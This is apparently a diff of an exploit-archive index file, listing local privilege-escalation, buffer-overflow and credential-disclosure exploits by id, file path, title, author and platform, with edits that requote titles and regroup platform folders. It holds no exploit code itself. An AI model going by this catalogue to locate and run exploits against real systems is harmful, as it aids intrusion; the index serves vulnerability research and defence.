20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
|
||||
20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
|
||||
20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
|
||||
20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0
|
||||
|
@ -7581,8 +7581,8 @@ id,file,description,date,author,platform,type,port
|
|||
21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
|
||||
21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
|
||||
21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0
|
||||
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
|
||||
21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0
|
||||
21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0
|
||||
21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local,0
|
||||
|
@ -7595,7 +7595,7 @@ id,file,description,date,author,platform,type,port
|
|||
21565,platforms/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0
|
||||
21566,platforms/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0
|
||||
21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,linux,local,0
|
||||
40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
|
||||
40348,platforms/win_x86-64/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
|
||||
21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
|
||||
21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0
|
||||
21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0
|
||||
|
@ -7610,7 +7610,7 @@ id,file,description,date,author,platform,type,port
|
|||
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
|
||||
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
|
||||
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
|
||||
40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
|
||||
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
|
||||
21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0
|
||||
21684,platforms/windows/local/21684.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0
|
||||
|
@ -7703,7 +7703,7 @@ id,file,description,date,author,platform,type,port
|
|||
22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0
|
||||
22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0
|
||||
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0
|
||||
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
|
||||
22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0
|
||||
22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0
|
||||
22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
|
||||
22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
|
||||
|
@ -7856,8 +7856,8 @@ id,file,description,date,author,platform,type,port
|
|||
23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0
|
||||
23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0
|
||||
23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0
|
||||
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
|
||||
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
|
||||
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
|
||||
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
|
||||
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
|
||||
23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0
|
||||
23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0
|
||||
|
@ -7901,7 +7901,7 @@ id,file,description,date,author,platform,type,port
|
|||
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
|
||||
24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
|
||||
24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
|
||||
24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
|
||||
24555,platforms/lin_x86-64/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,lin_x86-64,local,0
|
||||
24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
|
||||
24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
|
||||
24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
|
||||
|
@ -7935,7 +7935,7 @@ id,file,description,date,author,platform,type,port
|
|||
25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0
|
||||
25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
|
||||
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
|
||||
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
|
||||
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation",2013-05-01,aeon,linux,local,0
|
||||
25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0
|
||||
25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0
|
||||
25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
|
||||
|
@ -7973,7 +7973,7 @@ id,file,description,date,author,platform,type,port
|
|||
25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
|
||||
25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
|
||||
26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
|
||||
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
|
||||
26131,platforms/lin_x86-64/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",lin_x86-64,local,0
|
||||
26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
|
||||
26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
|
||||
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
|
||||
|
@ -8149,14 +8149,14 @@ id,file,description,date,author,platform,type,port
|
|||
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0
|
||||
30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0
|
||||
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0
|
||||
30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0
|
||||
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
|
||||
31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
|
||||
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
|
||||
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
|
||||
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
|
||||
31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,linux,local,0
|
||||
31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
|
||||
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
|
||||
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
|
||||
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
|
||||
|
@ -8173,7 +8173,7 @@ id,file,description,date,author,platform,type,port
|
|||
31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0
|
||||
31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0
|
||||
31959,platforms/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local,0
|
||||
40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
|
||||
40349,platforms/win_x86-64/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local,0
|
||||
31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0
|
||||
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0
|
||||
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0
|
||||
|
@ -8199,7 +8199,7 @@ id,file,description,date,author,platform,type,port
|
|||
32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0
|
||||
32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0
|
||||
32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
|
||||
32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0
|
||||
32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0
|
||||
32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0
|
||||
32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0
|
||||
32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0
|
||||
|
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
|
|||
33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
|
||||
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
|
||||
33161,platforms/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local,0
|
||||
33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0
|
||||
33213,platforms/win_x86/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,win_x86,local,0
|
||||
33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0
|
||||
33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
|
||||
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
|
||||
|
@ -8236,20 +8236,20 @@ id,file,description,date,author,platform,type,port
|
|||
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
|
||||
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
|
||||
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
|
||||
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
|
||||
33516,platforms/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",lin_x86-64,local,0
|
||||
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
|
||||
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
|
||||
33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
|
||||
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
|
||||
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
|
||||
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
|
||||
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
|
||||
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
|
||||
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
|
||||
40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0
|
||||
40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0
|
||||
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
|
||||
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
|
||||
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
|
||||
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (SGID)",2014-06-21,"Vitaly Nikolenko",linux,local,0
|
||||
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
|
||||
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
|
||||
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
|
||||
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
|
||||
|
@ -8298,7 +8298,7 @@ id,file,description,date,author,platform,type,port
|
|||
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
|
||||
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
|
||||
35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
|
||||
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
|
||||
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - 'hosts.deny' Privilege Escalation",2014-11-14,skynet-13,linux,local,0
|
||||
35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
|
||||
35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
|
||||
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
|
||||
|
@ -8389,7 +8389,7 @@ id,file,description,date,author,platform,type,port
|
|||
36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
|
||||
36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0
|
||||
37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
|
||||
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
|
||||
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0
|
||||
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
|
||||
36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0
|
||||
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0
|
||||
|
@ -8428,8 +8428,8 @@ id,file,description,date,author,platform,type,port
|
|||
37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
|
||||
37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
|
||||
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
|
||||
37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0
|
||||
37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0
|
||||
37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
|
||||
37724,platforms/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local,0
|
||||
37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0
|
||||
37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
|
||||
38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0
|
||||
|
@ -8519,7 +8519,7 @@ id,file,description,date,author,platform,type,port
|
|||
38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
|
||||
38792,platforms/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
|
||||
38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
|
||||
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0
|
||||
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation",2015-12-01,rebel,linux,local,0
|
||||
38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0
|
||||
38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
|
||||
38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0
|
||||
|
@ -8549,7 +8549,7 @@ id,file,description,date,author,platform,type,port
|
|||
